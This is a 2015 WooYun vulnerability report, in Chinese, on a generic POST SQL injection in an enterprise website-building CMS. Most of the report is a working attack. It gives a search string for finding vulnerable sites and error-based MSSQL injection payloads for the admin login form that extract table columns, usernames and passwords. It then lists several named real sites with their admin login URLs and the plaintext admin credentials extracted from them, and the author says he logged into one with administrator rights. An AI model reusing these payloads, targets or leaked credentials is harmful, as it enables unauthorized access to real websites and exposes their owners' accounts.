某企业建站系统通用型POST注入 | wooyun-2015-094868| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-094868

漏洞标题：某企业建站系统通用型POST注入

漏洞作者： 0x 80

提交时间：2015-02-05 10:46

修复时间：2015-03-22 10:48

公开时间：2015-03-22 10:48

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-05：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-03-22：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

通用型POST注入

详细说明：

三种方式能搜索到，影响部分企业公司网站
百度：本站由站务通提供动力支持

=====================================

漏洞证明：

开始案例，存在的案例还是很多的。小部分不能POST

1，先拿他做个试验
站务通代理平台

http://agent.useshow.com/
输入：

' having 1=1--

' having 1=1--

这么多表名出来了
列 'member_message.id' 在选择列表中无效，因为该列未包含在聚合函数中，并且没有 GROUP BY 子句。
列 'member_message.mlogin' 在选择列表中无效，因为该列未包含在聚合函数中，并且没有 GROUP BY 子句。
列 'member_message.mpwd' 在选择列表中无效，因为该列未包含在聚合函数中，并且没有 GROUP BY 子句。
列 'member_message.mpurview' 在选择列表中无效，因为该列未包含在聚合函数中，并且没有 GROUP BY 子句。
列 'member_message.mdefaultpwd' 在选择列表中无效，因为该列未包含在聚合函数中，并且没有 GROUP BY 子句。
列 'member_message.ex' 在选择列表中无效，因为该列未包含在聚合函数中，并且没有 GROUP BY 子句。
列 'member_message.dotime' 在选择列表中无效，因为该列未包含在聚合函数中，并且没有 GROUP BY 子句。
========================================
我就拿1个案例来演示下
http://www.ahfdyy.com/ConstructASP/Admin/Login.aspx
表几乎都是一样的。，我测试过
表名：vip_userInfo
字段：password

1' and 1=convert(int,(select top 1 col_name(object_id ('vip_userInfo'),1) from vip_userInfo)) and '1'='1

将 nvarchar 值 'id' 转换为数据类型为 int 的列时发生语法错误。

1' and 1=convert(int,(select top 1 col_name(object_id ('vip_userInfo'),2) from vip_userInfo)) and '1'='1

将 nvarchar 值 'vipCode' 转换为数据类型为 int 的列时发生语法错误。
1' and 1=convert(int,(select top 1 col_name(object_id ('vip_userInfo'),3) from vip_userInfo)) and '1'='1
将 nvarchar 值 'nickname' 转换为数据类型为 int 的列时发生语法错误
爆密码：' and (select top 1 vip_userInfo.password from vip_userInfo)>0--

' and (select top 1 vip_userInfo.nickname from vip_userInfo)>0--
将 nvarchar 值 '管理员' 转换为数据类型为 int 的列时发生语法错误。
' and (select top 1 vip_userInfo.vipcode from vip_userInfo)>0--
将 varchar 值 'ahfdyycom' 转换为数据类型为 int 的列时发生语法错误。
用户名ahfdyycom
密码fdyy888
登录看看，。看看对不

进去了。。成功登录

管理员权限。
再贴几个可以POST的，具体就不一一测试了
知道了这些细节，直接对登录口，就可以测试了
直接输入爆用户，密码的语句
经过试验
爆通用的用户：' and (select top 1 vip_userInfo.vipcode from vip_userInfo)>0--
爆通用的密码：' and (select top 1 vip_userInfo.password from vip_userInfo)>0--
查看密码即可
存在POST注入的站：
http://www.sz-wb.com/ConstructASP/Admin/Login.aspx
用户：szwbcom
密码：gsw0612ljn102380

====================================================
http://www.ahhssm.com/ConstructASP/Admin/Login.aspx
用户：ahhssmcom
密码；HS110528

===================================================
http://www.wuhutw.com/ConstructASP/Admin/Login.aspx

用户：将 varchar 值 'wuhutwcom' 转换为数据类型为 int 的列时发生语法错误。
密码：将 varchar 值 'tw0377' 转换为数据类型为 int 的列时发生语法错误。

============================================
http://handfoot120.com/ConstructASP/Admin/Login.aspx
用户：将 varchar 值 'handfoot120com' 转换为数据类型为 int 的列时发生语法错误。
将 varchar 值 'a18907028210' 转换为数据类型为 int 的列时发生语法错误。

================================================

http://www.hfzksy.com/ConstructASP/Admin/Login.aspx

用户将 varchar 值 'hfzksycom' 转换为数据类型为 int 的列时发生语法错误。
密码：将 varchar 值 'allan1416' 转换为数据类型为 int 的列时发生语法错误。

=============================================
http://www.nssold.com/ConstructASP/Admin/Login.aspx
将 varchar 值 'nssoldcom' 转换为数据类型为 int 的列时发生语法错误。
varchar 值 '15055310566' 的转换溢出了 int 列。超出了最大整数值。

============================================
就不一一测试了！！！

修复方案：

修复注入参数

版权声明：转载请注明来源 0x 80@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝